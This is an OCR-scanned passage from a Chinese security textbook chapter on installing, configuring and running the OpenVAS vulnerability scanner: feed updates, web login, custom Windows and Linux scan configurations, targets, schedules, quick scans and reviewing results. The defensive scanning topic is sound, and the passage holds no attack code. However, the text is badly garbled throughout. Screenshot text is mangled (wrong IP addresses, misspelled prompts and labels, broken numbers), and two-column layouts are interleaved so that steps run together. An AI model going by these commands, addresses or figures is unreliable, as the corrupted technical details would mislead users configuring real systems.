具 ， 为 了 保证 扫描 的 准确 性 ， 建 议 经 常 
对 软件 进行 升级 ， 这 时 可 以 使 用 Updating 
OpenVAS feeds 命 令 对 OpenVAS 进 行 定期 检 
查 升级 ， 如 果 存在 升级 会 自动 进行 更 新 。 
下 图 为 截取 的 部 分 更 新 信息 。 


=] Updating OpenVAS feeds 
*1 [1/3] Updating: NVT 

ent 159,119 bytes received 12,217,759 bytes 
otal size is 247,656,755 speedup is 19.96 


575,668.74 bytes/sed 


“~] [2/3] Updating: Scap Data 

Bent 328,324 bytes received 4,213,698 bytes 259,538.97 bytes/sec 
otal size is 992.859,082 speedup is 218.60 

usr/sbinyopenvasmd 

[ [3/3] Updating: Cert pata 

ent 22,771 bytes received 134,431 bytes 34,933.78 bytes/sec 
otal size is 55,172,448 speedup is 356.97 

usr/sbln/openvasmd 
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12.4.2 登录 OpenVAS 


安装 完 OpenVAS 软 件 ， 并 设置 好 账号 
密码 后 ， 便 可 以 登录 OpenVAS。OpenVAS 
采用 Web 登 录 ， 管 理 起 来 非常 方便 。 初 次 登 
录 OpenVAS 需 要 一 些 简 单 的 设置 ， 具 体 的 
设置 步骤 如 下 : 
[step 国 OpenVAS 启 动 后 会 打开 一 些 939 系 列 
端口 。 使 用 netstat -pantu | grep 939 命 令 查看 
端口 信息 并 过 滤 出 939 系 列 端口 ， 执 行 效果 
如 下 图 所 示 。 其 中 9390 是 OpenVAS 服 务 端 
口 ，9392 是 Web 登 录 端 口 。 
FootBkaUI5-# netstat -pantu | grep 939 
| 


tcp 6 09127.0.0.1:9399 9.0.0.0:+ LISTEN 6512/0openvasm 
tcp © 6 127.9.9.1:9392 0.0.9.0:+ LISTEN 6510/gsad 


如 果 9392 端 口 开 放 ， 便 说 明 OpenVAS 
的 服务 已 经 启动 ， 通 过 浏览 器 可 以 登录 Web 
页 面 ， 初 次 登录 会 有 警告 信息 ， 如 下 图 
所 示 。 


pour comection is not securd 


The owner of 127.0.0.1 has configured their website improperly. To protect your information from being stolen, 


Firefox has not connected to this website. 


Learn more, 


Report errors like this to help Mozilla identify and block malicious sites 


Advanced 


这 是 由 于 OpenVAS 采 用 HTTPS 加 密 传输 协议 ， 因 此 会 提示 安装 证 书 问 题 ， 这 时 需 在 
警告 信息 界面 中 单 击 Advanced 按 钮 ， 进 入 下 图 所 示 的 界面 。 


[27.0.0.1:9392 uses an invalid security certificate. 


he certificate is not trusted because the issuer certificate is unknown. 
he server might not be sending the appropriate intermediate certificates. 


nadditional root certificate may need to be imported. 


he certificate is not valid for the name 127.0.0.1. 


Error code: SEC_ERROR_UNKNOWN_ISSUER 


Add Exception.. 


侈 注意: 如 果 是 本 机 登录 可 以 使 用 https:// 127.0.0.1:9392/ 进 行 登录 。 


step 园 单 去 Add Exception 按 钮 ， 会 弹出 一 个 确认 添加 证 书 的 警告 信息 ， 如 下 图 所 示 。 
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Add Security Exception © 


You are about to ovarride how Firefox identifies this site. 
Legitimate banks, stores, and other public sites will not ask you to dothis. 
Server 


Location: | Ba | Get Certificate 


Certificate Status 
This site attempts to identify itself with invalid information. 


View- 
WrongSite 


The certificate belongs tya different site, which could mcar that somconc is trying toimpersonate this site. 
Unknown Identity 


The certificate Is not trusted because It hasn't been verifledas Issued by a trusted authorlty using a secure signature. 


[DPermanentty store this exception 


Confirm Security Exception Cancel 


step 较 单 击 Confirm Security Exception 按 钮 ， 确 认 添 加 安全 证 书 ， 并 跳 转 到 下 图 所 示 的 登录 
界面 ， 在 其 中 输入 管理 员 账号 与 密码 。 


Usermame: 
9 


2 


Greenbone | 
Security 
Assistant 


Password: 


单 击 Longin 按 钮 ， 进 入 下 图 所 示 的 主 界面 。 


地 pou 


人 移 注 意 : 如 果 系 统 重启 后 ， 默 认 OpenVAS 不 自动 启动 ， 需 要 手动 开启 。 手 动 开启 的 命令 
为 openvas-start， 执 行 效果 如 下 图 所 示 。 


Foot@kali:-~# openvas-start 
[*] Please wait for the 0penVAS services to start. 


[*] 

[*] You might need to refresh your browser once it opens. 

[*] 

[*] Web UI (Greenbone Security Assistant): https://127.9.9.1:9392 


12.4.3 ”配置 OpenVAS 
登录 OpenVAS 后 ， 便 可 以 配置 相关 扫描 信息 ，OpenVAS 提 供 了 丰富 的 配置 选项 ， 既 可 
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以 配置 快速 扫描 选项 ， 也 可 以 手动 配置 个 
性 化 扫描 选项 。 下 图 为 OpenVAS 框 架 的 运 
行 示意 图 。 

.OpenVAsS 


SIuallD 


ScanTargets 1 
| ; § 
| ; 
大 致 分 为 以 下 几 个 组 件 : 
e Scanner 组 件 : 用 于 扫描 ， 它 会 从 
NVT 数 据 库 中 提取 漏洞 信息 。 


e Manager 组 件 : 用 于 管理 Scanner 组 
件 ， 所 有 的 配置 信息 保存 在 Configs 
数据 库 中 。 

e CLI 组 件 ， 指令 控制 组 件 ， 用 于 对 
Manager 下 达 指 令 。 

e@ Security Assistant 组 件 ， 用 于 分 析 扫 
描 漏洞 并 生成 报告 文档 。 


Edit My Settings 
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首次 登录 OpenVAS， 可 以 修改 一 些 基 
本 信息 。 操 作 步 又 如 下 : 
[Sep 回 在 OpenVAS 首 页 中 ， 选 择 Extras 菜 单 ， 
在 打开 的 菜单 列表 中 选择 My Settings 菜 单 命 
令 ， 如 下 图 所 示 。 


Trashcan 


Performance 
CVSS Calculator 
Feed Status 


step 图 在 OpenVAS 中 ， 如 果 需 要 修改 信息 ， 
都 可 以 找到 一 个 类 似 扳 手 的 图 标 ， 如 下 图 
所 示 。 


| My Settings 
单 击 扳手 图 标 ， 进 入 基本 设置 修改 页 
面 ， 如 下 图 所 示 。 在 这 里 可 以 修改 时 区 、 
用 户 密 码 以 及 语言 环境 等 。 


Name Value 


Timezone 


Password 


User Interface Language 


Coordinated Universal Time ~ 


Browser Language 


Rows Per Page 10 

Details Export File Name 9%T%U 

List Export File Name %T%D 

Report Export File Name %T%U 

Severlty Class NVD Vulnerability Severit... v 
Dynamic Severity No 

Default Severity 100 


step 贺 默认 情况 下 ，OpenVAS 的 漏洞 评测 标准 是 NVD 模 式 ， 如 果 需 要 修改 ， 可 以 单 击 
Severity Class 右 侧 的 下 拉 按 钮 ， 在 弹出 的 下 拉 列 表 中 选择 不 同形 式 的 评分 标准 ， 如 下 图 所 
示 ， 其 中 包括 BSI、OpenVAS、PCI-DSS 等 标准 。 


EA 
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Details Export File Name 


BSI Schwachstellenampel 
{Germany) 


OpenVAS Classic 
PCI-DSS 


List Export File Name 
Report Export File Name 
eveny Class 
step 园 设置 完成 后 ， 单 击 下 方 的 Save 按 
钮 ， 即 可 保存 设置 ， 并 退出 基本 设置 修改 
页 面 。 


12.4.4” 自 定义 扫描 


默认 情况 下 ，OpenVAS 提 供 了 多 种 扫 
描 配 置 ， 不 过 这 些 都 是 通用 的 ， 如 果 需 要 
针对 某 些 特定 的 设备 进行 扫描 ， 则 需要 自 
定义 配置 。 


NVD Vulnerability Severit... 2 


1. 设置 扫描 配置 


开始 扫描 之 前 需要 先 设置 一 个 扫描 配 
置 ， 创 建 自 定义 扫描 配置 的 操作 步骤 如 下 : 
step 国 选择 Configuration 菜 单 ， 在 打开 的 菜 


上 Configs (8 of 8) 


mpty 
人 Empty an 
Full and fas 
《Most NVT's; optimized by using previously colected information,) 
Full and fast ultimare 

ist NVTS IncCluding those that can stop services/hosts; optimized by using previously cobected nfarmation ) 
Full and very deep 

lost NVT's; dont trust previously collected information; slow) 


Full and very dt 
(Most NVT's Inclus 


sorvices/hosts; don't trust previousy colected information; Sion) 
Host Discovery 
(Network Host Discovery scan configuration ) 


System Discovery 
Network Systam Discovery scan configuration) 


[step 图 单 击 左上 方 的 “创建 ”图 标 ， 可 以 创 
建 自 定义 配置 ， 如 下 图 所 示 。 


和 a Scan Configs 


[step 园 打开 New Scan Config 对 话 框 ， 在 其 中 
输入 新 建 扫描 的 名 称 、 备 注 信息 以 及 基础 
配置 ， 如 下 图 所 示 。 


© Empty saticand iast 
Fuland fast 
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单列 表 中 选择 Scan Configs 菜 单 命令 ， 如 下 


图 所 示 。 


Targets 
Port Lists 
Credentials 


Estee 图 打开 Scan Configs 对 话 框 ， 在 其 中 可 
以 查看 OpenVAS 的 默认 扫描 配置 项 ， 如 下 
图 所 示 ， 包 括 Discovery (发 现 型 扫描 ) 、 
empty《〔〈 一 个 空 的 扫描 ) 、Full and fast( 完 
整 的 快速 扫描 ) 、Full and fast ultimate 〈 完 
整 快速 极限 扫描 ) 、Full and very deep( 非 
常 深度 扫描 ) 、Full and very deep ultimate 

(深度 极限 扫描 ) 、Host Discovery (主机 
发 现 扫描 ) 、System Discovery (系统 发 现 
扫描 ) 等 ， 除 此 之 外 还 可 以 看 到 每 个 扫描 
配置 的 漏洞 分 类 以 及 NVT 数 量 。 


昌 21 © 2373 器 Bao0 
国 。 -ED 日 OG 
6 已 803%4 品 Duo0 
四 ez 器 so 器 GO0 
国 o: 避 asoxa [ze[ 
四 oz 口 #04 口 BOG 
2 -BE 口 Guo0 
呈 。 Di» Ss gao0 


step 图 输入 完成 后 ， 单 击 Create 按 钮 ， 进 入 
编辑 扫描 配置 界面 ， 如 下 图 所 示 。 


New Scan 


n Conng 


Name | Windows scan| 
Comment 
Base (©) Emply, static and fast 


Full and fast 


[ecwes) 
step 较 在 Family 选 项 中 有 两 个 单 选 按钮 ， 其 
中 第 1 个 是 箭头 向 上 的 图 标 ， 选 中 它 代表 如 
果 后 续 有 漏洞 更 新 自动 加 入 扫描 配置 ， 箭 
头 向 右 的 图 标 如 果 选 中 ， 代 表 仅 当前 这 些 


配置 项 ， 即 使 后 续 有 更 新 也 不 自动 添加 ， 
如 下 图 所 示 。 这 里 建议 选择 第 1 项 ， 如 有 特 
殊 需 要 可 以 选择 第 2 项 。 


Family@ TO 


[step 园 因为 这 里 的 配置 是 针对 Windows 系 
统 的 漏洞 扫描 ， 因 此 会 去 除 一 些 不 必要 的 
漏洞 扫描 。 配 置 项 1 如 下 图 所 示 ， 其 中 包 
括 Brute force attacks (暴力 破解 ) 、Buffer 
overflow 〈 缓 冲 区 溢出 ) 、Compliance ( 合 
规 性 ) 、Databases (数据 库 ) 等 。 


回 
9 
9 回 
9 加 
© 加 
© 加 
© 回 
complanc or7 GoD 
Danasos oarssg QO a 


配置 项 2 如 下 图 所 示 ， 其 中 包括 
Default Accounts (默认 账户 ) 、Denial 
of Service〈 拒 绝 服务 ) 、FTP (FTP 服 务 
器 ) 、Finger abuses〈 滥 用 ) 、Gain a shell 
remotely (远程 获取 shell) 、General (通用 
性 ) 等 。 


EE 


0of1356 
5 Local Securly Checks 0of125 


Frp 0of173 


Securiy Checks 90f10616 


oof6 
ewalls 0ofl8 
amos Lecal Sacurty Checks oof34 
out47 


0ofl06 


[~ 征 ~> 古 ~ 十 ~ 招生 ~ 业 ~ 昨 ~ 时 ~ 荐 ~ 匠 *| 
ooo0000600000 
可 
RN 


加 日 


Oof42g9 


[sp 图 配置 项 3 如 下 图 所 示 ， 其 中 包括 
Malware (恶意 软件 ) 、Nmap NSE (Nmap 
脚本 ) 、Nmap NSE net (Namp 网 络 脚本 ) 、 

Peer-To-Peer File Sharing (点 对 点 文件 共 
享 ) 、Policy (策略 ) 、Port scanners( 端 
口 扫描) 、Privilege escalation 〈 提 权 ) 、 

Product detection (产品 检测 ) 、RPC 等 。 
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REwae 55155 LO 可 

Mancrake Local Securty Checks 0 of492 on 

Es Be 

Nmap NSE Oof154 zc] 回 

nap NsE not oof77 避 c 口 日 

Pe ee po] 

fan rao prostocuseony neds om Do”] 

上 汪汪 eh Bag 口 
Oof656 局 c 回 口 
本 cg 加 
aa oD 加 
0of2059 De 回 

lec oo -| 吕 

step 酉 配置 项 4 如 下 图 所 示 ， 其 中 包括 Remote 


file access (远程 文件 访问 ) 、SMTP problems 
(SMTP) 、SNMP (SNMP) 、 SSL and TLS 
(SSL 和 TLS 协 议 ) 、Service detection 〈 服 务 

检测 ) 、Settings (设置 ) 、Useless services 
(无 用 的 服务 ) 等 。 


Dory 
oofsz 
oor7 
oaf6a 
oofa17 
Betngs ool2 
0o1534 
oof1 
of1426 
oor3t9 
0of14 


0of59 


BOSQNQoONNQNSNNNNQg 
BOG000006000000 


Wed 3e of400 


vers 加 

配置 项 5 如 下 图 所 示 ， 其 中 包括 

Windows 以 及 Windows:Microsoft Bulletins 
(微软 公告 ) 等 。 


aa 加 可 
[7 =| 过 
aaro -| 


[step 图 设置 完成 后 ， 单 击 Save 按 钮 保存 配 
置 ， 再 返回 界面 的 下 方 ， 可 以 看 到 已 经 
添加 了 自 定义 扫描 项 ， 具 体 信息 包括 27 项 
19059 种 漏洞 ， 如 下 图 所 示 。 至 此 ， 便 成 功 
创建 了 针对 Windows 系 统 的 扫描 配置 。 


> E] ET 
6 oO» 9 AGol 
27 BB 1909 © ol 


侈 注意 : 自 定义 扫描 项 的 右 侧 提供 了 删 
除 、 修 改 、 复 制 、 导 出 功能 ， 默 认 配 置 项 
是 不 可 以 删除 和 修改 的 。 


pA 
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2. 创建 扫描 对 象 


开始 漏洞 扫描 之 前 需要 确定 扫描 对 象 ， 
而 OpenVAS 中 任何 的 动作 都 需要 提前 进行 
配置 。 创 建 扫描 对 象 的 操作 步 又 如 下 : 
[step 图 选择 Configuration 菜 单 ， 在 打开 的 
菜单 列表 中 选择 Targets 菜 单项 ， 如 下 图 
所 示 。 


Port Lists 


Credentials 
Scan Configs 


在 打开 的 界面 中 ， 单 击 左上 角 的 “ 创 


N 


Name Winodw-PC1 


Comment 


©) Manual 


Hosts From file 


选择 需要 扫描 的 端口 ， 这 里 提供 了 
非常 多 的 选项 ， 有 和 针对 TCP/UDP 的 单独 选 
项 ， 还 有 针对 常用 端口 的 选项 以 及 全 端口 
扫描 等 。 这 时 可 以 单 击 下 拉 按 钮 ， 在 弹出 
的 下 拉 列 表 中 进行 选择 ， 如 右 图 所 示 。 这 
里 选择 OpenVAS Default 选 项 ， 当 然 如 果 想 
自 定义 端口 ， 也 可 以 单 击 右 侧 的 “创建 ” 
图 标 自 行 创建 。 


Eee 图 主机 探测 也 同样 提供 了 丰富 的 选项 ， 

这 里 选择 Consider Alive 选 项 ， 即 使 主机 不 
响应 探测 数据 包 ， 也 依然 认为 主机 是 存活 
状态 ， 并 完成 扫描 ， 如 右 图 所 示 。 


到 已 经 创建 好 的 主机 列表 ， 如 下 图 所 示 。 


建 ” 图 标 ， 创 建 目标 对 象 如 下 图 所 示 。 


国 。 


[step 图 打开 New Target 对 话 框 ， 在 其 中 输入 
目标 名 称 ， 如 下 图 所 示 。 目 标 地 址 有 两 种 
方式 : 

(1) 选择 Manual 项 ， 可 以 直接 输入 IP 地 
址 ， 多 地 址 之 间 使 用 过 号 分 隔 。 

(2) 选择 From file 项 ， 可 以 将 需要 扫描 的 
IP 地 址 保存 成 文件 ， 最 后 导入 该 文件 。 


192.168.1.103 


Browse... No file selected. 


AIl IANA assigned TCP 20... 2 


Alive Test 


Credentials for authenticated Ups je 
All TCP 
SSH 
All TCP and Nmap 5.51 
SMB top 100 UDP 
ESXi Nmap 5.51 top 2000 
TCP and top 100 UDP 
SNMP 
~ 
Port List OpenVAS Default ” 
Alive Test Consider Alive v 


Credentials for 
L checks 


step 园 基本 选项 都 设置 完成 后 ， 单 击 Create 按 钮 ， 即 可 完成 创建 。 在 返回 的 页 面 中 可 以 看 


的 (1 of 1) 


Windwos-PC1 192.168.1.103 1 OpenVAS Default 


Bie[H 
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( 侈 注意 : 在 Configuration 菜 单列 表 中 有 一 个 Port Lists 菜 单 ， 通 过 这 个 菜单 可 以 修改 扫描 的 
端口 。 修 改 后 的 端口 列表 如 下 图 所 示 。 


电 Port Lists (9 of 9) 


es 
[wm mw | 


All IANA assigned TCP 2012-02-10 四 5e25 5625 日 加 器 
All lANA assigned TCP and UDP 2012-02-10 加 10988 5625 5363 目 回 器 
Al privileged TCP 加 1023 1023 o 日 0 
All privileged TCP and UDP 加 2046 1023 1023 目 回 器 
AnTcP 民 65555 65535 0 目 加 口 B 
All TCP and Nmap 5.51 top 100 UDP 导 65634 65535 9 日 四 DO 
All TCP and Nmap 5.51 top 1000 UDP 国 66534 65535 999 BIZIe[ 
Nmap 5.51 top 2000 TCP and top 100 UDP 加 2098 1999 99 回 加 口 四 

| openvas Default 导 4481 4481 0 目 功 口 加 


3. 创建 扫描 任务 


设置 完 自 定 义 扫描 配置 并 创建 好 扫描 对 象 后 ， 接 下 来 便 可 以 创建 一 个 扫描 任务 。 
OpenVAS 的 扫描 任务 设置 也 是 非常 的 灵活 ， 可 设 定 在 规定 的 时 间 进 行 扫描 ， 也 可 设置 周期 
性 扫描 ， 这 样 更 加 符合 漏洞 管理 的 要 求 。 创 建 扫描 任务 的 操作 步骤 如 下 : 
Eee 加 创建 一 个 扫描 调度 计划 ， 选 择 在 打开 的 界面 中 ， 单 击 左上 角 的 “ 创 
Configuration 菜 单 ， 在 打开 的 菜单 列表 中 选 ” 建 ”图 标 ， 创 建 一 个 扫描 任务 ， 如 下 图 所 示 。 
择 Schedules 菜 单项 ， 如 下 图 所 示 。 画 百 


Schedules 


step 图 打开 Edit Schedules 对 话 框 ， 在 其 中 可 


Report Formats 以 设置 调度 的 名 称 ， 可 以 选择 初次 扫描 的 
Agents 时 间 ， 还 可 以 选择 以 后 计划 扫描 的 时 间 ， 
如 下 图 所 示 。 


Edit Schedule 


Name everyday _scan 


Comment 


FirstTime Tuesday 30 October 2018 百 at E_ 转 " [to 转 " 


Timezone Coordinated Universal Time ~ 


por 二 - 
Duration hour(s) 


[GE 国 设置 完成 后 ， 单 击 Save 按 钮 ， 在 返回 的 界面 中 可 以 看 到 刚刚 设置 的 调度 任务 ， 如 下 
图 所 示 。 
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上 
Schedules (1 of 1) 


ee ee ouion Jections 
everyday scan TueOct3003:10:002018 UTC Wed Oct 31 03:1000 2018 UTC 1day Shours [= 


[31# 
[ET | 


step 图 选择 Scans 菜 单 ， 在 打开 的 菜单 列表 ”[step 较 在 打开 的 界面 中 ， 单 击 左上 角 的 “ 创 
中 选择 Tasks 莱 单项 ， 如 下 图 所 示 。 建 ”图 标 ， 创 建 一 个 扫描 任务 ， 如 下 图 所 示 。 


本 Be 
Dashboard PT 
. 二 | 


es Tasks 


Results 


打开 New Tasks 对 话 框 ， 在 其 中 可 以 设置 扫描 任务 的 名 称 ， 还 可 以 调用 之 前 创建 好 的 
调度 配置 、 扫 描 配 置 等 ， 如 下 图 所 示 。 


Name New_ Scan 
Comment 
ScanTargets | Windwos-PC1 "| 
Alerts [| 
Schedule | everyday _scan ” once 总 
Addresultsto (yes no 
Assets 
Apply Overrides yes Ono 
Min QoD [|m 图 % 
Aherable Task yes A no 


Auto Delete  (®) Do notautomatically delete reports 
和 各 Automatically delete oldest reports but always keep newest| 5 国 'epors 
Scanner OpenVAS Default 
Scan Config Windwos-scan 
Estee 图 设置 完成 后 ， 单 击 Save 按 钮 ， 在 返回 的 界面 中 可 以 看 到 刚刚 设置 的 扫描 任务 ， 如 下 
图 所 示 。 


Reports 
[ee J 


加 中 日 四 局 口 
Appy to aoe conters HU 


移 注 意 : 右 侧 的 时 钟 图 标 可 以 修改 调度 计划 ， 类 似 播 放 按 钮 可 以 在 计划 启动 后 停止 当前 
扫描 任务 。 


4. Linux_Unix 扫 描 配 置 
前 面 学 习 了 如 何 创 建 自 定义 扫描 ， 这 里 再 给 出 一 个 自 定义 Linux 系 统 的 扫描 配置 ， 相 
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信 经 过 这 两 种 系统 的 配置 ， 读 者 一 定 能 够 
掌握 创建 自 定义 扫描 配置 的 方法 。 

创建 Linux 扫 描 配 置 也 需要 经 历 相同 的 
一 些 步 又， 这 里 省 去 了 相同 的 步骤 ， 只 给 
出 最 终 的 配置 项 ， 所 需 步 又 如 下 : 
[sep 图 通过 新 建 扫描 配置 ， 也 可 以 通过 复制 
已 有 的 扫描 配置 进行 修改 。 这 里 选择 复制 
已 有 的 扫描 配置 进行 修改 ， 在 扫描 配置 页 
中 选择 左 侧 的 复制 图 标 ， 在 打开 Edit Scan 
Config 对 话 框 中 输入 扫描 配置 名 称 ， 如 下 图 
所 示 。 


Edit Scan Config 


| Linux_Unix_Scan 


Name 


Comment | Most NVT's; optimized by using previous 


Edit Network Vulnerability Test Families 
step 固 Linux 配 置 项 1， 如 下 图 所 示 。 


AIXLocal securly checks 1of1 已 [5| 
Amazon Linux Local Securlty Checks 748 01743 | 器 
Brute prceattacl gol9 已 日 
Bufer overlow 562 of 562 © [sl 
cisco 647 of647 | 
CentOS Local Security Checks 2471of2471 =| 加 
Clbtx Xonarver Local Secuity Checks 300130 | 器 
Compllance 7o17 总 刁 
Daiabases 550 of550 局 器 


Linux 配 置 项 2， 


Deblan Local Securlty Checks 2830 of 2830 GCC 回 
Detault Accounts 21601216 Or 加 
Denlal of Service 1356 of 1356 Or@"| 口 
F5 Local Security Checks 125 of125 Lo 二 ~] 

FIP 173of173 CQz 思 ~] [S| 
Fedora Local Security Checks 10616of106156 OG [| 
Finger abuses 6of6 o 吕 已 后 
Firewalls 180f18 GCC 日 
FonlOS Local Securly Checks 340134 C7 +| | 
FreeBSD Local Security Checks 437of437 GCC | 
Gain a shell remotely 106 of 106 O70~| 
General 4298 of 4299 O70=| 

Gentoo Local Security Checks 693 of693 [O07@=| 5 
HP-UX Local Security Checks 150f15 OF-=| 


step 园 Linux 配 置 项 3， 如 下 图 所 示 。 


第 12 章 无 线 网 络 中 主机 漏洞 的 安全 防护 = 


TGnundschutz 109 of109 [D7 "| 
FGrundschutz-10 91of91 = [| 
IFGrundschutz-11 102of102 oOCe 
IFGrundschutz-12 85of85 [O70 
ITFGrundschutz-13 85of85 中 局 已 
IFGrundschutz-15 85of85 oOog 器 
JunOS Local Security Checks 136 of136 OOC 可 | 
Mac OSX Local Security Checks 193of193 [Oz "| 加 | 
Mageia Linux Local Security Checks 329 of329 [O77 ~ 加 
Malware 50of50 [ze -| 
Mandrake Local Secunly Checks 402 01402 oO 已 

Neware 8of8 [ez 志 =| 

Nmap NSE 154of154 [DO 本 -| 

Nmap NSE net 177of177 [oz 二 = 

step 轿 Linux 配 置 项 4， 如 下 图 所 示 。 

Oracle Linux Local Securlty Checks 1895 of1895 [Ol 7 B+| 
Palo Alto PAN-OS Local Security Checks 400140 OQOm 器 
Peer-To-Peer Fle Sharing 210121 局 DC 日 
Polcy 656 of656 局 CE 回 
Pon scanners 20115 Ol]| ] 
Prvlege escalaton 600160 oO 日 
Product detection 2059 of2059 [Om 回 
RPC 11ofll [DO 7 +| 加 | 
Red Hal Local Securlly Checks 1574 of 1574 [Ol 7 ~*| 加 
Remote We access 58 of 58 [D7 回 
SMTP problems 52of52 [DO 7 @~+| 加 
SNMP 70l7 oO 加 
SSLandTLS 630163 ©OOn 加 
Sevice detecton 216 of217 [Ol 7 +| 回 
Linux 配 置 项 5， 如 下 图 所 示 。 

Setmngs 12of12 GDOC5 可 | 
Slackware Local Securly Checks 534 01534 oO 
Solaris Local Securlty Checks 1oll O70*| 回 
SuSE Local Security Checks 1426 of 1426 [Ow~| 回 
Ubuntu Local Security Checks 3119 of3119 [CO # @~+| 四 | 
Useless sevices 14of14 GDoCE 
VMware Local Securiy Checks 58 of58 [Ox@~| 回 
Web servers 400 of400 @DC 

Web apphcauon abuses 5654 of 5655 ©@OOS 四 | 
Windows 181 of181 © ] 
Windows : Microsof Bulleuns 1967 of1967 O70 ] 


Toatez 48034or48050 加 


5. 快速 扫描 


除了 自 定义 扫描 外 ，OpenVAS 还 提供 
了 一 个 快速 扫描 设置 ， 输 入 一 个 主机 地 址 
便 可 以 开始 快速 扫描 。 进 行 快速 扫描 的 操 
作 步 又 如 下 : 
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址 ， 如 下 图 所 示 。 
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夯 一 


i 


step 国 在 创建 扫描 任务 界面 中 有 一 个 魔法 棒 图 标 国 ， 如 下 图 所 示 。 


[se 图 单 击 魔法 棒 图 标 国 ， 便 可 以 进入 快速 扫描 设置 界面 。 在 IP 地 址 栏 中 输入 一 个 主机 地 


/Quick start: Immediately scan an IP address 
IP addreas or hostrame: 
1921631103 


The Oralit a0ess SSEInerYOULCOTPUIE of YOU networe galeway. 
As a shor-cut | will do the following for you: 


1 Creae a new Target 
2 Croaio a new Tack 

3 Start thls Scan Iask nght away 
4 Switch the view to reloed every 30 seconds so you can lean back and watch the scan progress 


By ehciing the New Task icon EY you can cmate a new Tiakyaumag 


In fact, you must not lean back. As soon as the scan progess ls beyond 19%, you can aheady jump mo 
the Scan fpor via the ink in the Reporis Total column and review the results calected so fa 


When creatng te Target and Task | wi use Ime dietaults zs confgured In "My Setings 


单 击 Start Scan 按钮 ， 便 可 以 开始 一 个 快速 扫描 。 此 时 在 扫描 任务 列表 中 便 会 有 一 个 


已 启动 的 扫描 计划 ， 如 下 图 所 示 。 


Severity ”图 |Trend 
[| 


Immediate scan of IP 192.168.1.103 


00) 


CoOBGSCO 


step 轩 单 击 左 侧 name 中 的 名 称 ， 可 以 打开 快速 扫描 中 给 出 的 配置 项 ， 如 下 图 所 示 。 


= 
EA Immediate scan of IP 192.168.1.105 


Name: 
Comment 


Add to Assets: 


Alterable Task 


Auto Delete Reports: 


Scanner 


Status: 


Duration of last scan: 
Average scan duration 


Immediate scan of IP 192.168.1.105 
Target for immediate scan of IP 192.168.1.105 


(Next due: over) 

yes 

Apply Overrides: yes 

Min QoD: 70% 

no 

Do not automatically delete reports 
OpenVAS Default (Type: OpenVAS Scanner) 
Scan Config: Full and fast 

Order for target hosts: N/A 

Network Source Interface: 

Maximum concurrently executed NVTs per host: 10 
Maximum concurrently scanned hosts: 30 


Reports: 1, Current: Oct 30 2018 (Finished: 0) 
Results: 10 
Notes: 0 
lOverride: 0 


12.4.5 ”结果 及 其 他 


通过 前 面 的 学 习 相 信 读 者 已 经 可 以 配置 并 开启 一 个 扫描 了 ， 下 面 介绍 OpenVAS 中 扫描 


结果 以 及 一 些 其 他 功能 。 
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1. 扫描 结果 

当 扫 描 进行 到 一 定 程度 ， 不 但 可 以 看 到 扫描 的 进度 状态 ， 还 可 以 查看 目前 已 经 扫描 出 
的 结果 。 查 看 扫描 结果 的 操作 步骤 如 下 : 
[step 图 在 扫描 任务 列表 中 Status 项 ， 指 出 了 当前 扫描 的 进度 ， 如 下 图 所 示 。 


Immediate scan of IP 192.158.1.105 ol [TT TI 
Mm dU 


step 图 单 去 Status 中 的 扫描 进度 ， 便 可 以 打开 Report: Results 界 面 ， 如 下 图 所 示 。 该 界面 会 
按照 漏洞 威胁 程度 进行 排列 。 


DCI O79 WC- 6-cBOeDe0G06| 
Nodifed 


Gemer_aemn, 


nentity 2222s oo]west teaton]Actons | 


Check for riogin Service 局 EE 70% 192.168.1105 5Btcp 四 并 
UnreallaCd Authentication Spoofing wunerablity 襄 0% 192.168.1.105 6657kcp 因 国 
Anenymous FTP Login Reporting 局 丽 Z 0% 192.108.1105 21rcp 四国 
Check if Mallserver answer to VRFY and EXPN requests 日 本 D2 99% 192.1608.1105 zsncp 四 国 
SSL/TLS; Deprecated SSLv2 and SSLv3 Protocol Detection 书 本 二 96% 192.1681105 34zncp 四国 
3S3UTLS, pepteuated 5sLvz ad 55L73 Muturul Dete tion El s0% 192.4691105 zsth 四国 
SSL/TLS: RSA Temperary Key Handing RSA_EXPORT Downgrade lssue = 

ee 口 80% 192.168.1.105 25tcp 。 因 国 
SSUTLS: SSLv3 protocol cac Cipher Suites Information Disclocure LE 

We (POODLE) 加 80% 192.168.1.105 5432/tcp 四 国 
SSL/TLS: SSLv3 Protocol Cac cipher Suites Information Disclsure EE 

rh EE 80% 192.168.1.105 25tcp ”四 国 
SSH Weak MAC Algorithms Supported 器 ED 95% 1921691105 )2rcp 。 四国 


图 单 去 Vulnerability 中 的 任意 一 项 ， 可 以 打开 该 漏洞 的 简要 信息 ， 如 下 图 所 示 。 其 中 包 
括 该 漏洞 的 一 个 简要 报告 、 存 在 的 位 置 、 威 胁 程度 以 及 修复 建议 等 。 


ee 
Phpinfo0 output Reporting a0% 1921681105 optcp 

Summary 

Many PHP installation tutoriale instruct the user to craate 3 file caled phpinfo php 0 Smilar containing the phpinfol) statement Such a filo i 
often left back in the webserver directory. 

Vulnerability Detection Result 

The following files are calling the function phpinfo() which disclose potentially sensitive infornation: 
http://192.168.1.105/mutillidas/phpinfo php 

http://192.168.1.105/phpinfo. php 

Impact 

Snme nf the information thar can he 9athered fm this fle includee 

The username of the user running the PHP process, ff it is a sudo user, the IP address of the host, the web server Version, the system version 
{Unix, Linux, Windows, ...), and the root directory of the web servar. 

Solution 

Solution type: © workaround 

Delete the listed files or restrict access to them. 


Vulnerability Detection Method 
Details: phpinfo() output Reporting (OID: 1.3.6.1.4.1.25623.1.0.11229) 


[Version used: $Revision: 11992 $ 


侈 提示 : 扫描 出 的 漏洞 并 不 完全 准确 ， 需 要 后 续 的 验证 ， 如 果 确 实 存在 可 以 使 用 漏洞 列 
表 左 侧 的 图 标 为 其 添加 注释 信息 。 这 个 可 以 通过 单 击 右 侧 左边 的 Add Do 
如 果 扫 描 出 的 漏洞 并 不 存在 ， 这 里 只 是 误 报 ， 再 或 者 漏洞 确实 存在 但 威胁 并 没有 那么 

这 时 可 以 调整 漏洞 评分 ， 通 过 单 击 最 右 侧 的 Add Override 按 钮 ， 可 以 在 打开 的 New ver 
对 话 框 中 进行 调整 ， 如 下 图 所 示 。 
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NvrName Ei Le Doon 
Active © yes, always 
yes brthenext | 30 | days 


no 


Hosts OAmy (© 1921631105 
Lacaton -OO Ary © generaltep 
Severty Oy 回 >00 
NowSeverhy 加 | False Postive omer 
Task CD Amy (©) mmedatsqt20scanat200ph20IpW20192 168 1105 
Result GD Amy O) Oriyth selsced one (9aa6373.08014a57-8015 d638ca60a599) 
Text 


